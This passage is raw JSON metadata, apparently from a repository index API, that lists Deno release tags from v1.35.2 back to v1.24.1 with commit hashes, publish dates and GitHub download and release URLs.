Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"h